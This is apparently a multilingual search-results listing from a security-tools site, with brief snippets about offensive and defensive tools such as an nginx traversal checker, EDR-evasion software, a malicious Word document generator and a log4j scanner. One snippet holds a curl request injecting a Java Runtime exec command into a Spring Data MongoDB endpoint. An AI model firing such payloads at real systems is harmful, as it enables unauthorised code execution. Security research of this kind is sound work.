214977 matches found
navgix
navgix navgix 是一个多线程 Golang 工具,用于检查 nginx 别名遍历漏洞。 技术方法 目前,navgix 支持 2 种技术来发现存在漏洞的目录(或 location 别名)。分别是: 启发式 navgix 会向页面发起初始 GET 请求,如果页面 HTML 中指定了任何目录(在 html 组件的 src 属性中指定),它将测试路径中的每个文件夹是否存在漏洞,因此如果它发现指向 /static/img/photos/avatar.png 的链接,它将测试 /static/、/static/img/ 和 /static/img/photos/。 暴力破解 navgix...
navgix
navgix navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities Techniques Currently, navgix supports 2 techniques for finding vulnerable directories or location aliases. Those being the following: Heuristics navgix will make an initial GET request to the...
PHP-Shell-Detector
Web Shell Detector Web Shell Detector – is a php script that helps you find and identify php/cgiperl/asp/aspx shells. Web Shell Detector has a “web shells” signature database that helps to identify “web shell” up to 99%. By using the latest javascript and css technologies, web shell detector has ...
EDRSandblast
EDRSandBlast EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections Notify Routine callbacks, Object Callbacks and ETW TI provider and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring. As of...
CVE-2026-8732
CVE-2026-8732 — WP Maps Pro ≤ 6.1.0 ♡ 未认证权限提升——通过创建管理员账户 ♡ === shadow ♡ & friska === 📋 漏洞信息 字段| 详细信息 ---|--- CVE ID| CVE-2026-8732 CVSS 评分| 9.8 严重 CVSS 向量| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 类型| 关键功能缺少身份验证 插件| WP Maps Pro wp-google-map-gold 受影响版本| 所有 ≤ 6.1.0 的版本 已修复版本| 6.1.1 发布时间|...
blueXploit
blueXploit blueXploit video blueXploit is my own proof-of-concept that reproduces CVE-2023-45866 , the Bluetooth keystroke-injection vulnerability discovered by Marc Newlin. It abuses a flaw in the Bluetooth protocol to inject keystrokes into a target device without pairing , opening the door to...
dontgo403
dontgo403 is a tool to bypass 40X errors. Installation Grab the latest release for your OS from RELEASES Outdated atm Or compile by your own RECOMMENDED: root@kitploit: git clone https://github.com/devploit/dontgo403; cd dontgo403; go get; go build Customization If you want to edit or add new...
VK-Scraper
VK Scraper vk-scraper is a command-line application written in Python that scrapes and downloads VK user's / community's data. Use responsibly. To get a better understanding of how it works, head to the docs. Features Scrape photos Scrape videos both uploaded and external Scrape saved photos Scra...
CVE-2021-40444-exp
CVE-2021-40444 PoC 利用 CVE-2021-40444(Microsoft Office Word 远程代码执行)的恶意 docx 生成器 此脚本的创建基于对在野使用样本的部分逆向工程:938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52(docx 文件) 首先需要安装 lcab(sudo apt-get install lcab) 查看 REPRODUCE.md 获取手动复现步骤 如果生成的 cab 无法工作,请尝试将 exploit.html URL 指向 calc.cab 使用 首先根据给...
CVE-2026-18718
Advisory: GHSA-pcfh-853f-q3gh · Severity: High CVSS 7.5 · Affected: Ghidra ≤ 12.1.2 · Fixed: c03a70d Ghidra 12.1.3 Opening someone else's Ghidra project was enough to execute their code. Ghidra 12.1.2 stores analyzer options inside the program database , and one of those options is a filesystem...
poc-cve-collection
poc-cve-collection Poc CVE Collection 🧪 Collects CVE PoCs and backs them up to the Internet Archive when they are unavailable on GitHub. Donate Support the maintenance of this project with PayPal or by scanning the QR code below. Example root@kitploit: CVE-2026-31431 Title crypto: algifaead -...
osint-scraper
Social Recon This application locates and compiles information about online personalities, given a username and/or email address. Use this to investigate your own online presence, summarize the digital footprint of someone you know, or uncover the person behind a specific username. Getting Starte...
osint-scraper
Social Recon このアプリケーションは、ユーザー名やメールアドレスを指定して、オンライン上の人物に関する情報を特定・収集します。自分のオンラインプレゼンスを調査したり、知人のデジタルフットプリントを要約したり、特定のユーザー名の背後にある人物を特定するために使用してください。 はじめに リポジトリをクローンまたはフォークしてマシンに配置します。 ダウンロード後、cd で osint-scraper ディレクトリに移動します。 Python 3 で新しい仮想環境を作成し、有効にします。 python3 -m venv ENV source ENV/bin/activate 次の...
aws_exposable_resources
AWS Exposable Resources The goal of this repo is to maintain a list of all AWS resources that can be publicly exposed, and eventually, those that can be shared with untrusted accounts that section is still in development and not included here yet. The following concepts are applied in this list:...
RawCopy
Introduction This a console application that copy files off NTFS volumes by using low level disk reading method. Syntax RawCopy /ImageFile:FullPath\ImageFilename /ImageVolume:1,2...n /FileNamePath:FullPath\Filename /OutputPath:FullPath /AllAttr:0|1 /RawDirMode:0|1|2 /WriteFSInfo:0|1 /TcpSend:0|1...
Spring-Data-Mongodb-Example
Spring-Data-Mongodb-Example CVE-2022-22980 環境 Docker 環境の構築 root@kitploit: docker build -t mongo . docker run -dit -p 6666:6666 mongo Poc root@kitploit: ➜ Spring-Data-Mongodb-Example git:main curl 0:6666/v1/user/get -d 'id=Tjava.lang.Runtime.getRuntime.exec"touch /tmp/aaaa"'...
shfz
shfz A scenario-based web application fuzzng tool that supports fuzz generation by genetic algorithm. Features Easy to customize fuzzing test by scripting fuzzing scenario in JavaScript / TypeScript Third-party packages can be used in fuzzing scenario script Genetic algorithm fuzz generation...
Tools
Tools Cyber Security Tools SecTools.Org: Top 125 Network Security Tools List of SecTools.Org: Top 125 Network Security Tools - For more than a decade, the Nmap Project has been cataloguing the network security community's favorite tools. Kali Tools Kali Tool List - Kali Linux Tools Listing...
MCP-Inspector-CVE-2025-49596
MCP Inspector CVE-2025-49596 漏洞检测器 该脚本用于检测 MCP Inspector 服务器是否受到 CVE-2025-49596 漏洞影响,该安全问题表现为 /sse 端点响应未经身份验证的请求(缺少身份验证令牌)。 工作原理 脚本向目标 MCP Inspector 服务器的 /sse 端点发送 GET 请求。 检查响应: 如果服务器返回 HTTP 200 OK 且未要求提供身份验证令牌 ,则很可能存在漏洞。 如果服务器返回 HTTP 401 Unauthorized,则很可能已修补(v0.14.1+)。 其他响应则报告为意外情况。 依赖要求 Python...
log4j-scan
1 使用方法 CVE-2021-44228 log4j 2.x RCE脆弱性検出ツール。対象URLにGETリクエストを送信し、dnslogを使用して応答の有無を確認します。 root@kitploit: $ python3 log4j-scan.py -h Usage: python log4j-scan.py -u Options: -h, --help このヘルプメッセージを表示して終了 -u URL, --url=URL 検査対象のURLを入力(例: https://ainrm.cn) 2 実行画面 1...